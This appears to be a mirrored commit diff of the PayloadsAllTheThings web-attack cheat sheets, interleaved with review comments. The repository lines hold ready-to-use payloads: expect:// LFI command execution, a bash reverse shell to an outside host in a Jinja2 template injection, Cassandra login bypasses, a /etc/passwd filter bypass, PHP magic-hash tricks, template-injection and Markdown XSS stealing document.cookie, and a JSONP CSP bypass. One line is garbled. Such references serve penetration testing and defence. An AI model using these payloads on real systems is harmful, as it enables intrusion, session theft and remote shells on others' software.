mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Cassandra SQL + XSS MD + PHP Type Juggling
This commit is contained in:
parent
90f4c3634e
commit
2a080f82e6
@ -174,8 +174,8 @@ Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://ex
### Wrapper expect://

```powershell
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
```

### Wrapper input://
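Review bot: only `expect://` is a registered PHP stream wrapper scheme; the `php:expect://` spelling is not, so if both variants are meant to stay, say what the prefixed form is supposed to hit, otherwise keep the plain form only. The section should also state that this wrapper exists only when the PECL `expect` extension is loaded (it is not part of a default PHP build), since that is the first thing a defender checks when assessing whether an LFI reaches command execution. Finally, the fence is tagged `powershell` for a list of URLs, which only misleads the highlighter; a plain fence is better.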
@ -245,7 +245,7 @@ http://example.com/index.php?page=path/to/uploaded/file.png
In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf

## LFI to RCE via upload (race)

Worlds Quitest Let's Play"
* Upload a file and trigger a self-inclusion.
* Repeat 1 a shitload of time to:
* increase our odds of winning the race
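Review bot: `Worlds Quitest Let's Play"` carries an unbalanced quote and reads like a link title whose `[title](url)` wrapper was lost; restore the full link or drop the line. The step `* Repeat 1 a shitload of time to:` refers to "step 1", but the steps are bullets, so number them (`1.`, `2.`) for the reference to resolve.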
@ -1,6 +1,35 @@
# PHP Juggling type and magic hashes

## Exploit
## Type Juggling

True statements

```php
var_dump('0010e2' == '1e3'); # true
var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0
var_dump('0xABCdef' == ' 0xABCdef'); # true PHP 5.0 / false PHP 7.0
var_dump('0x01' == 1) # true PHP 5.0 / false PHP 7.0
var_dump('0x1234Ab' == '1193131');

'123' == 123
'123a' == 123
'abc' == 0

'' == 0 == false == NULL
'' == 0 # true
0 == false # true
false == NULL # true
NULL == '' # true
```

NULL statements

```php
var_dump(sha1([])); # NULL
var_dump(md5([])); # NULL
```

## Magic Hashes - Exploit

```php
<?php
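Review bot: `var_dump('0x01' == 1)` is missing its `;`, and `'' == 0 == false == NULL` is not valid PHP (`==` is non-associative, so chaining it is a parse error); keep that line as prose above the fence and let the four pairwise lines under it carry the result. `var_dump('0x1234Ab' == '1193131');` is the only comparison in the block without a result comment; it is the same hex-string case as the `0xABCdef` lines (true on PHP 5, false on PHP 7, where hex strings are no longer numeric), so annotate it the same way. The `' 0xABCdef'` line appears twice in the new block. For `sha1([])`/`md5([])`, state the version as the block above does: PHP 5 and 7 return NULL with a warning, PHP 8 throws a TypeError, so the NULL-comparison trick only applies to the older runtimes.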
@ -8,9 +37,6 @@ var_dump(md5('240610708') == md5('QNKCDZO'));
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
var_dump('0010e2' == '1e3');
var_dump('0x1234Ab' == '1193131');
var_dump('0xABCdef' == ' 0xABCdef');
?>
```
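Review bot: with the `'0010e2'`, `'0x1234Ab'` and `'0xABCdef'` lines moved up into Type Juggling, this section is left showing only that the magic-hash pairs compare equal, with no line saying why (both `md5('240610708')` and `md5('QNKCDZO')` produce digests beginning with `0e` followed by digits, which loose comparison parses as the float 0 in scientific notation) or what the fix is. Add one sentence that `===`, or `hash_equals()` on the hash strings, defeats every line in this block; that is the one thing a reader auditing code will want from the page.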
@ -102,6 +102,8 @@ who$@ami
Bypass blacklisted word with variable expansion

```powershell
/???/??t /???/p??s??

test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
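Review bot: the fence is tagged `powershell`, but `${test//hhh\/hm/}` is bash pattern substitution (not POSIX sh and not PowerShell), so tag it `bash` and say it needs bash. The first line, `/???/??t /???/p??s??`, is glob expansion rather than variable expansion and does not match the heading; either move it under the wildcard material or retitle the block. A one-line note that both `cat` forms expand to `/etc/passwd` would make the trick readable, and it is worth stating the defensive takeaway: the payload never contains the blocked string, so keyword blacklists on commands are not a control.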
37
SQL injection/Cassandra Injection.md
Normal file
@ -0,0 +1,37 @@
# Cassandra Injection

> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system

## Cassandra comment

```sql
/* Cassandra Comment */
```

## Cassandra - Login Bypass

### Login Bypass 0

```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```

### Login Bypass 1

```sql
username: admin'/*
password: */and pass>'
```

The injection would look like the following SQL query

```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```

Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)

## Thanks to

* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
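Review bot: Login Bypass 0 gives no expansion of the resulting query while Login Bypass 1 does; add one, and document that `%00` is a URL-encoded NUL which only cuts off the rest of the statement if the application URL-decodes the input before building the query. The `sql` fences around the `username:`/`password:` pairs hold form fields, not SQL, so a plain fence reads better there; keep `sql` for the `SELECT`. Heading style is inconsistent between `## Cassandra comment` and `## Cassandra - Login Bypass`. A closing line that the fix is prepared statements, which the Cassandra drivers support, would round off the page.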
@ -1,6 +1,6 @@
# MYSQL Injection

## MySQL
## MySQL

```sql
# MYSQL Comment
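Review bot: the two `## MySQL` lines in this hunk render identically, so the change here is whitespace only; say so in the commit message, or better, since the heading introduces the comment-syntax block, rename it to `## MySQL comment` to match the new `## Cassandra comment` heading. `# MYSQL Injection` against `## MySQL` is also inconsistent casing.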
@ -1,6 +1,6 @@
# SQL injection

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.

## Summary
@ -9,6 +9,7 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/Cassandra%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
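Review bot: the new `CheatSheet Cassandra Injection` entry is appended after SQLite, breaking the alphabetical order the surrounding entries (OracleSQL, PostgreSQL, SQLite) follow; move it into its alphabetical position. The absolute `blob/master` link form matches its neighbours, which is fine.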
@ -201,15 +201,21 @@ Inject this template
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
```

## AngularJS
## Client Side Template Injection

### AngularJS - Basic injection
### AngularJS

```javascript
$eval('1+1')
{{1+1}}
```

### Vue JS

```javascript
{{constructor.constructor('alert(1)')()}}
```

## Thanks to

* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
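Review bot: the new `### Vue JS` block carries the same `{{constructor.constructor('alert(1)')()}}` payload this commit also adds to `XSS injection.md`, with no version range, whereas the Angular entries elsewhere are version-scoped; state which Vue versions it applies to or link the source, and consider keeping it in one file and cross-linking. `## Client Side Template Injection` is a sensible split, but the section should say in one line what distinguishes it from the server-side sections above: the expression is evaluated in the victim's browser, so the impact is XSS rather than RCE, and the fix is to render user input as data rather than compile it as a template.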
BIN
Server Side Template injections/serverside.png
Normal file
Binary file not shown.
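Review bot: `serverside.png` is added, but none of the visible hunks in this commit reference it; if the README is meant to embed it, add the image line in the same commit, otherwise the binary is dead weight in the repository.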
@ -6,7 +6,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [Identify an XSS endpoint](#identify-an-xss-endpoint)
- [XSS in HTML/Applications](#xss-in-htmlapplications)
- [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
- [XSS in files](#xss-in-files)
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
- [Polyglot XSS](#polyglot-xss)
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
- [CSP Bypas](#csp-bypass)
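Review bot: the summary entry `[CSP Bypas]` is misspelled (`CSP Bypass`); it is unchanged context, but this hunk already edits the adjacent lines, so fix it here. The new `(XML/SVG/CSS/Flash/Markdown)` suffix enumerates sub-sections, so the Markdown block added further down should carry a matching sub-heading rather than a bare `XSS in Markdown` line, otherwise the anchor promises a section the file does not have.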
@ -233,6 +233,15 @@ XSS in SVG (short)
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
```

XSS in Markdown

```csharp
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
```

XSS in SWF flash application

```powershell
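Review bot: the Markdown XSS fence is tagged `csharp`; tag it `markdown` (the Flash block that follows has the same problem with `powershell`). The four payloads all depend on the renderer passing `javascript:`, a space-padded scheme name, or a `data:` URI through as a link target; a sentence stating that the defence is an allowlist of URL schemes (`http`, `https`, `mailto`) applied after the renderer normalises the target, which is what also rejects `j a v a s c r i p t:`, would make the block useful to whoever has to fix the renderer.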
@ -693,6 +702,8 @@ Exotic payloads

## CSP Bypass

Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://blog.thomasorlita.cz/vulns/google-csp-evaluator/)

### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))

//google.com/complete/search?client=chrome&jsonp=alert(1);
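Review bot: `//google.com/complete/search?client=chrome&jsonp=alert(1);` sits outside a code fence, unlike every other payload in the file; fence it. The line should also state its precondition: it only works when the policy's `script-src` allows `google.com` (or a wildcard covering it), because the JSONP endpoint reflects the `jsonp` parameter into a script body. The mitigation is nonce- or hash-based `script-src` with `'strict-dynamic'` instead of host allowlists, which is exactly the class of finding the linked CSP Evaluator reports.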
@ -132,3 +132,9 @@ Angular 1.0.1 - 1.1.5
```javascript
{{constructor.constructor('alert(1)')()}}
```

Vue JS

```javascript
{{constructor.constructor('alert(1)')()}}
```
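Review bot: the added `Vue JS` entry duplicates, character for character, the `Angular 1.0.1 - 1.1.5` payload directly above it and the block this commit adds to the SSTI README; give it a version range like the Angular entries, or cite where it was tested, and pick one file to own it. One line of context would help too: the payload only fires when user input is compiled as a Vue template, so the defensive check is whether the application ever passes untrusted strings into a template, not the framework version alone.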